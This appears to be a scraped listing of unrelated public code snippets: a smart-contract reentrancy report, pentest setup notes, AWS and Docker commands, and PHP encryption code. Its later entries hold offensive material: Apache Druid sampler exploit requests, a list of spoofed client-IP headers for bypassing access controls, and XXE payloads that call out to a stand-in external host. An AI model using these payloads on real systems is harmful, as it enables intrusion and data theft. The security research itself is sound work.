fatherGoose1

Bug Description

There is a reentrancy vulnerability in TectonicStakingPoolV3.sol (https://cronoscan.com/address/0xE165132FdA537FA89Ca1B52A647240c2B84c8F89).

The issue arises due to the function performConversionForTokens() which is currently open for anyone to call because tcmPublicAccess is currently true. During a call to performConversionForTokens(), reentrancy can be achieved with the end result being the free minting of xTonic tokens. A brief description of the token conversion process:

• The staking pool contract holds predominantly TONIC.
• Other approved tokens held by the staking pool can be swapped for TONIC. For example, if the pool holds some WCRO, it can be swapped for TONIC using performConversionForTokens() which increases the contract's TONIC balance, thus increasing rewards for its stakers.
• Upon successful conversion, any extra TONIC that was received during the swap (more than the oracle quote) is sent to the function caller as a reward.

The issue with the above is that a caller can

shariqmalik

Configure WSA (Windows Subsystem for Android) for Pentest

Install WSA with Megisk

Follow the instructions to install WSA with Megisk and GooglePlay services. MagiskOnWSALocal

Install following Modules in Magisk

Download following modules for Magisk.

• MagiskFrida: A Magisk module that automatically runs frida server at boot

shariqmalik

Oneliners to generate formated temporary AWS STS credentials based on a preconfigured AWS profile.

For Windows (Powershell)

aws sts get-session-token --duration-seconds (Read-Host -Prompt "Session Duration") --serial-number (Read-Host -Prompt "Serial Number") --token-code (Read-Host -Prompt "MFA code") | ConvertFrom-Json | %{$_.Credentials} | %{@{aws_access_key_id=$_.AccessKeyId;aws_secret_access_key=$_.SecretAccessKey;aws_session_token=$_.SessionToken}} | ConvertTo-Json -Compress | %{$_ -replace "{","`n`n[profile-name]`n"} | %{$_ -replace "}",""} |  %{$_ -replace ":"," = "} | %{$_ -replace '"',""} |  %{$_ -replace",","`n"} | %{$_ -replace "profile-name", (Read-Host -Prompt "Profile Name")} | tee -Variable _ | Add-Content $HOME\.aws\credentials

For Linux (bash)

perXautomatik

This script has not been checked by Spiceworks. Please understand the risks before using it.

TheTinkerDad

To install Docker on Debian as root:

  1) apt-get update
  2) apt-get install ca-certificates curl gnupg lsb-release
  3) curl -fsSL https://download.docker.com/linux/debian/gpg | gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
  4) echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/debian \
     $(lsb_release -cs) stable" | tee /etc/apt/sources.list.d/docker.list > /dev/null
  5) apt-get update
  6) apt-get install docker-ce docker-ce-cli containerd.io

ahbanavi

<?php
const PASSPHRASE = ''; // use 'openssl rand -hex 32' to generate key, same with python

function encrypt(array $data): string
{
    $data_json_64 = base64_encode(json_encode($data));
    $secret_key = hex2bin(PASSPHRASE);
    $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length('aes-256-gcm'));
    $tag = '';
    $encrypted_64 = openssl_encrypt($data_json_64, 'aes-256-gcm', $secret_key, 0, $iv, $tag);

pikpikcu

POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1006
Connection: close

0xf4n9x

POST /druid/indexer/v1/sampler HTTP/1.1
Host: x.x.x.x:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1045
Connection: close

kaimi-

CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
Client-IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARD_FOR: 127.0.0.1
FORWARD-FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1

honoki

<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y